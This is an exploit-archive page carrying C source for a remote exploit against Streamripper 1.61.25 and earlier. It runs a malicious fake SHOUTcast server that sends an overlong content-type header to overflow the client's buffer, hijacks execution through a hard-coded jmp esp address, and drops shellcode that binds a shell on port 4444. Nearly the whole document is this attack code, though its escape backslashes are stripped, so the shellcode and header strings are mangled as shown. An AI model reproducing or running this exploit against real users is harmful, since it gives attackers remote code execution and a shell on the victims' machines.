Streamripper <= 1.61.25 HTTP Header Parsing Buffer Overflow Exploit 2

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Streamripper <= 1.61.25 HTTP Header Parsing Buffer Overflow Exploit 2
# Published : 2006-08-29
# Author : psylocn
# Previous Title : MySQL (<= 4.1.18, 5.0.20) Local/Remote Information Leakage Exploit
# Next Title : MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040) (2)
/*   
 * name:		streamripper  <= 1.61.25 win32 remote exploit
 * 
 * bug by:		Ulf Harnhammar
 * status:		public 
 * exploit:		psylocn
 * payload:		portbind 4444
 * **********************************************************
 * K:>exploit.exe 80 0
 * [ public-release ]                                            
 *        streamripper  <= 1.61.25 remote exploit               
 *        exploit by psylocn 2006                               
 *        bug by Ulf Harnhammar                                 
 *                                                              
 * [+] server started!                                           
 * [+] server waits                                              
 *                   
 * 
 * go to next shell
 * K:>streamripper.exe http://127.0.0.1:80
 * Connecting...
 * 
 * on other shell
 * [+] client conneted!                                          
 * [+] exploit send check shell on port 4444 
 *
 * now connect to 127.0.0.1:4444  
*/

/* #define _WIN32 */  
  
#include <stdio.h>  
#include <stdlib.h>  
#include <string.h>  
  
#ifdef _WIN32  
#include <winsock2.h>  
#pragma comment(lib, "ws2_32")  
#else  
#include <sys/types.h>  
#include <netinet/in.h>  
#include <sys/socket.h>  
#endif  

/* portbind shellcode port 4444*/  
unsigned char portbindsc[] =   
"x29xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xaf"
"xbfxf8x2ax83xebxfcxe2xf4x53xd5x13x67x47x46x07xd5"
"x50xdfx73x46x8bx9bx73x6fx93x34x84x2fxd7xbex17xa1"
"xe0xa7x73x75x8fxbex13x63x24x8bx73x2bx41x8ex38xb3"
"x03x3bx38x5exa8x7ex32x27xaex7dx13xdex94xebxdcx02"
"xdax5ax73x75x8bxbex13x4cx24xb3xb3xa1xf0xa3xf9xc1"
"xacx93x73xa3xc3x9bxe4x4bx6cx8ex23x4ex24xfcxc8xa1"
"xefxb3x73x5axb3x12x73x6axa7xe1x90xa4xe1xb1x14x7a"
"x50x69x9ex79xc9xd7xcbx18xc7xc8x8bx18xf0xebx07xfa"
"xc7x74x15xd6x94xefx07xfcxf0x36x1dx4cx2ex52xf0x28"
"xfaxd5xfaxd5x7fxd7x21x23x5ax12xafxd5x79xecxabx79"
"xfcxecxbbx79xecxecx07xfaxc9xd7xe9x76xc9xecx71xcb"
"x3axd7x5cx30xdfx78xafxd5x79xd5xe8x7bxfax40x28x42"
"x0bx12xd6xc3xf8x40x2ex79xfax40x28x42x4axf6x7ex63"
"xf8x40x2ex7axfbxebxadxd5x7fx2cx90xcdxd6x79x81x7d"
"x50x69xadxd5x7fxd9x92x4exc9xd7x9bx47x26x5ax92x7a"
"xf6x96x34xa3x48xd5xbcxa3x4dx8ex38xd9x05x41xbax07"
"x51xfdxd4xb9x22xc5xc0x81x04x14x90x58x51x0cxeexd5"
"xdaxfbx07xfcxf4xe8xaax7bxfexeex92x2bxfexeexadx7b"
"x50x6fx90x87x76xbax36x79x50x69x92xd5x50x88x07xfa"
"x24xe8x04xa9x6bxdbx07xfcxfdx40x28x42x5fx35xfcx75"
"xfcx40x2exd5x7fxbfxf8x2axccxccxccxccxccxccxccxcc";  
 
char part1[] = "ICY 200 OKrnicy-notice1:aaaaarn"
                   "icy-notice2:SHOUTcast Distributed Network Audio Server/FreeBSD v1.9.7<BR>rn"
                   "icy-name:Radioseven - www.radio.dern"
                   "icy-genre:Dance Trance Housern"
                   "icy-url:http://www.radio.dern"
                   "content-type:";                 //buffer to exploit
                   
char part2[] = "rn"
                   "icy-pub:1rn"
                   "icy-metaint:8192rn"
                   "icy-br:CCCCCCCrnrn";
                   
char fixstack[] = "x81xc4xffxefxffxffx44"; //sub esp, 4097 + inc esp

struct targets {  
	int	num;  
	char	name[50];  
	long	jmpaddr;  
}  
target[]= {  
    { 0, "WinXP [sp2 ger] ", 0x7c951eed }, //jmp esp 
    { 1, "debug [testing] ", 0x41414141 },
};  

void Usage(){
	
	int i;
	printf("Usage: exploit.exe port targetnn"				
			   "Targets:nn");
	for (i = 0; i < 2; i++)
	{
		if(target[i].name != 0)
			fprintf(stderr," [%u] %sn",i,target[i].name);
		else
			break;
	}
	exit(1);
}  

int  main (int argc, char **argv)  {  
  
	char *host;  
	struct sockaddr_in my_addr;
    struct sockaddr_in their_addr;
    int sockfd,port,new_sock,sin_size=sizeof (their_addr);  
	   

	char buffer[3565];	 
  
#ifdef _WIN32  
	WSADATA wsa;  
#endif  
  

#ifdef _WIN32  
	 WSAStartup(MAKEWORD(2,0), &wsa);  
#endif  
  
	printf("[ public-release ]n");
	printf("tstreamripper  <= 1.61.25 remote exploit n");  
	printf("texploit by psylocn 2006n");  
	printf("tbug by Ulf Harnhammarnn"); 
	
	unsigned long ntarget = 0;
	if (argc < 3) Usage(); 
    if ((ntarget = atoi(argv[2])) > 1) Usage(); 
 
    port = (unsigned short)atoi(argv[1]);

	if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {  
		printf("[-] socket errorn");  
		return 0;  
	}
	
    my_addr.sin_family = AF_INET;         
    my_addr.sin_port = htons(port);
    my_addr.sin_addr.s_addr = INADDR_ANY;   
	
	if (bind (sockfd, (struct my_addr *) &my_addr, sizeof (my_addr)) == SOCKET_ERROR) {  
		printf("n[-] bind errorn");  
		return 0;  
	}
    else printf ("[+] server started!n");
    
    if (listen (sockfd, 3) == SOCKET_ERROR)  {  
		printf("n[-] listen errorn");  
		return 0;  
	}
	printf ("[+] server waitsn");
	
	if ((new_sock = accept(sockfd, (struct sockaddr *)&their_addr,&sin_size))  == INVALID_SOCKET)  {  
		printf("n[-] accept errorn");  
		return 0;  
	}
 	else
 	printf ("[+] client conneted!n");
   
    memset ( buffer, 0x90, sizeof(buffer) - 1 );
    memcpy ( buffer, part1, strlen(part1) );
    memcpy ( buffer+3146, &target[ntarget].jmpaddr, 4);
    memcpy ( buffer+3150, fixstack,strlen(fixstack) );
    memcpy ( buffer+3150+strlen(fixstack),portbindsc, strlen(portbindsc));
    
    memcpy ( buffer+3515, part2, sizeof(part2) );
	
	if (send(new_sock, buffer,sizeof(buffer)-1, 0) < 0) {  
		printf("[-] send errorn");  
		return 0;  
	}
	sleep(2000);
    printf("[+] exploit send check shell on port 4444n");  

	closesocket(sockfd);  
#ifdef _WIN32 
  WSACleanup ();
#endif   
return 0;  
} 

// www.Syue.com [2006-08-29]